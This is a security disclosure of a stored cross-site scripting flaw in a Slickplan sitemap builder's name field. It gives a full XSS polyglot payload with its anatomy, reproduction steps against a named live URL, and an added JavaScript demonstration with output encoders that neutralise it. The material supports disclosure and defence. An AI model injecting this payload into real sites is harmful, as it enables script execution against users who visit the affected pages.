Product Owner: Slickplan Sitemap Builder
Found by: xdff4ee
Application Name: Basic sitemap builder Version 1.0
Severity: High
Authentication: Required
Complexity: Easy
Vulnerability Name: Stored Cross-site scripting - XSS Polyglot (Stored)
Vulnerability Explanation: An XSS polyglot is an XSS vector that executes in its raw form across several injection contexts (HTML body, tag attribute, JavaScript string, HTML comment), so a single payload tests many output sinks at once.
Browsers Verified In:
Firefox 68.0.2 (64-bit)
Google Chrome 76.0.3809.100 (64-bit)
Anatomy of the polyglot (mixed case throughout defeats naive case-sensitive keyword filters)
jaVasCript:: A label in ECMAScript; a URI scheme otherwise, for example when the value lands in an href attribute.
/*-/*`/*\`/*'/*"/**/: A multi-line comment in ECMAScript; outside a script it is a literal-breaker sequence that closes whichever quote (backtick, single or double) the value was injected into.
(/* */oNcliCk=alert() ): The execution zone. In a JavaScript context the parentheses evaluate oNcliCk=alert(), which calls alert(); inside an HTML tag the same bytes become an oNcliCk attribute.
//%0D%0A%0d%0a//: A single-line comment in ECMAScript that hides the rest of the line from the parser; if the value is URL-decoded into an HTTP response header it becomes a double CRLF.
</stYle/</titLe/</teXtarEa/</scRipt/--!>: A tag-breaker sequence that closes style, title, textarea and script elements and, through --!>, an HTML comment, so the svg that follows is parsed as markup.
\x3csVg/<sVg/oNloAd=alert()//>\x3e: An svg element whose oNloAd handler fires as soon as it is parsed; \x3c and \x3e are hex escapes that turn into < and > where the value is JavaScript-unescaped before reaching the DOM.
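To show what the sequences above do once the value reaches a JavaScript sink, the following is an added example written for this page; it is not the report's own code and says nothing about how Slickplan renders the field. It feeds the report's exact payload into two generated-script contexts (a raw JavaScript context, and a single-quoted string literal into which a name is concatenated) with alert() replaced by a recording stub, then applies context-aware encoders (an HTML entity encoder and a JSON-based JavaScript string encoder) that neutralise it. The variable name sitemapName and the encoder function names are this example's own assumptions.

```javascript
// Added example, not code from the Slickplan report: the report's exact
// polyglot driven through two JavaScript injection contexts, with alert()
// replaced by a recording stub, followed by the encoders that neutralise it.

// The payload from the report, as a JS string literal. Backslashes and quotes
// are escaped here so the runtime value is exactly the raw polyglot text.
const POLYGLOT =
  "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert(123) )//%0D%0A%0d%0a//" +
  "</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(123)//>\\x3e";

// Execute generated script text with alert() stubbed. Returns the arguments
// alert() was called with, the error thrown (if any) and the return value.
// `oNcliCk` is declared as a parameter so the polyglot's assignment to it
// stays local instead of creating an implicit global. Function-constructor
// bodies run in sloppy mode, as an inline <script> would.
function runWithAlertStub(source) {
  const calls = [];
  const alertStub = (arg) => { calls.push(arg); };
  let error = null;
  let value;
  try {
    value = new Function("alert", "oNcliCk", source)(alertStub, undefined);
  } catch (e) {
    error = e;
  }
  return { calls, error, value };
}

// Context 1: the value is dropped straight into JavaScript. `jaVasCript:` is
// a label, the /* ... */ block is a comment, and ( oNcliCk=alert(123) ) runs;
// `//` comments out the HTML-oriented tail so the line still parses.
function rawJsContext(value) {
  return runWithAlertStub(value);
}

// Context 2 (vulnerable): the value is concatenated into a single-quoted
// string literal, e.g. var sitemapName = '<name>'. The polyglot's ' closes
// the literal, /*"/**/ is a comment, and the string is then "called" with
// oNcliCk=alert(123) as its argument: alert(123) fires while the argument is
// evaluated, and only afterwards does the call itself throw a TypeError.
function vulnerableJsStringContext(value) {
  return runWithAlertStub("var sitemapName = '" + value + "';");
}

// Encoder for a JavaScript string literal: JSON.stringify escapes quotes,
// backslashes and control characters; < and > are escaped too so the literal
// can never form </script> inside an inline script, and U+2028/U+2029 are
// escaped because older engines treat them as line terminators.
function escapeForJsString(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Context 2 (hardened): the same template built with the encoder. The script
// returns sitemapName so the caller can confirm the value round-trips intact.
function hardenedJsStringContext(value) {
  return runWithAlertStub(
    "var sitemapName = " + escapeForJsString(value) + "; return sitemapName;");
}

// Encoder for an HTML text node or a quoted attribute value. With every
// metacharacter entity-encoded, the tag-breaker and svg sequences become
// inert text and oNcliCk/oNloAd never become attributes.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return value.replace(/[&<>"']/g, (c) => map[c]);
}

// True if the string still carries a character that can break out of an HTML
// text or quoted-attribute context.
function hasHtmlMetachars(value) {
  return /[<>"']/.test(value);
}

console.log("raw JS context, alert calls:", rawJsContext(POLYGLOT).calls);
console.log("vulnerable string context, alert calls:",
  vulnerableJsStringContext(POLYGLOT).calls);
console.log("hardened string context, alert calls:",
  hardenedJsStringContext(POLYGLOT).calls);
console.log("HTML-encoded:", escapeHtml(POLYGLOT));
```

The two encoders are deliberately separate: a value that is HTML-encoded and then placed inside a script block is still live JavaScript, and a JavaScript-encoded value written into an attribute is still live HTML. The fix for the Sitemap Name field is to apply the encoder that matches each sink where the name is rendered, not to filter the input.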
Impact:
Stored XSS allows an attacker to embed a malicious script into a vulnerable page, which is then executed every time any user views the page. Unlike reflected cross-site scripting, which relies on a victim being socially engineered into clicking a crafted link (sent via email, for example), it needs no interaction beyond a normal visit to the affected sitemap.
Proof of Concept: (Stored Cross-site scripting - XSS Polyglot (Stored))
Affected items:
Sitemap:
Url: https://lmentrix.slickplan.com/sitemap/edit/nxwhsr7gra
Stored Polyglot XSS execution in different browsers
Payload Used:
Payload wrapped in an HTML comment (the polyglot's --!> terminates the comment early, so the svg element that follows is still parsed):
<!--
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(123) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(123)//>\x3e
-->
Steps to reproduce:
Log in with a valid username and password.
Enter the above payload in the Sitemap Name field and click to create the sitemap; the stored polyglot XSS payload then executes in your browser.
It executes again after refreshing the page and after clearing cookies, confirming that the payload is persisted server-side rather than reflected from the request.
A complete PoC video is also attached for better understanding.
After repeated e-mails the vendor did not reply, so I decided to disclose publicly.